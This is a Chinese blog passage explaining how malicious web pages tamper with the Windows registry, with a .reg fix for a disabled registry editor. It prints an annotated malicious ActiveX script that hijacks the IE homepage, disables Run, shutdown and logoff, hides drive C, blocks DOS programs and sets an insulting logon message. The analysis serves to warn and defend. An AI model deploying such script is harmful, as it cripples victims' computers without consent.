瀏覽網頁註冊表被禁用

原創

2019-07-16 13:11

瀏覽網頁註冊表被禁用

這是由於註冊表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改爲“1”的緣故，將其鍵值恢復爲“0”即可恢復註冊表的使用。

解決辦法：用記事本程序建立以REG爲後綴名的文件，將下面這些內容複製在其中就可以了：

REGEDIT4
            [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
            “DisableRegistryTools”=dword:00000000

10、瀏覽網頁開始菜單被修改

這是最“狠”的一種，讓瀏覽者有生不如死的感覺。瀏覽後不僅有類似上面所說的那些症狀，還會有以下更悲慘的遭遇：

1)禁止“關閉系統”
            2)禁止“運行”
            3)禁止“註銷”
            4)隱藏C盤——你的C盤找不到了！
            5)禁止使用註冊表編輯器regedit
            6)禁止使用DOS程序
            7)使系統無法進入“實模式”
            8)禁止運行任何程序

原來，該網頁是有人利用Java技術製作的含有有害代碼的ActiveX網頁文件。爲讓更多的人瞭解其危害，查看其源代碼，將其主要部分列了出來，並加了詳細的註釋（文中有“注”字的部分註釋）。

注：下面代碼是將你的IE默認連接首頁改爲[url]http://www.findfeel.com/[/url]

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
            Start Page", "http://www.findfeel.com/"）;
            注：以下是該網頁修改受害者的註冊表項所用的招數
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
            \\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
            注：使受害者系統沒有“運行”項，這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表
            的修改。
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
            注：使受害者系統沒有“關閉系統”項
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
            注：使受害者系統沒有“註銷”項
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
            注：使受害者系統沒有邏輯驅動器C
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
            注：禁止運行所有的DOS應用程序；
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
            注：使系統不能啓動到“實模式”（傳統的DOS模式）下；
            又注：進入該網頁，它還會修改以下的註冊表項，使WINDOWS系統登錄時顯示一個登錄窗口（在
            MicroSoft網絡用戶登錄之前）
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Winlogon\\LegalNoticeCaption", "嗚啦啦..."）;
            注：這些代碼會使窗口的標題是“嗚啦啦…”
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
            Winlogon\\LegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按確定
            進入悲慘世界"）;
            注：上面一行是會在窗口中顯示出來的文字
            注：下面兩行代碼修改註冊表，使受害者所有的IE窗口都加上以下的標題：“嗚啦啦…”
            Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
            Window Title", "嗚啦啦..."）;
            Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
            Window Title", "嗚啦啦..."）;
            注：到上面一行爲止，完成了對受害者的註冊表的所有修改！
            注：下面代碼用來將其網頁增加到受害者的收藏夾中
            var WF, Shor, loc;
            WF = FSO.GetSpecialFolder（0）;
            loc = WF + "\\Favorites";
            if（!FSO.FolderExists（loc））
            {
            loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\
            " + Net.UserName + "\\Favorites";
            if（!FSO.FolderExists（loc））
            {
            return;
            }
            }
            注：下面就是使其網頁加入到你的收藏夾的具體代碼
            AddFavLnk（loc, "找到感覺[url]www.findfeel.com[/url]", "http://www.findfeel.com"）;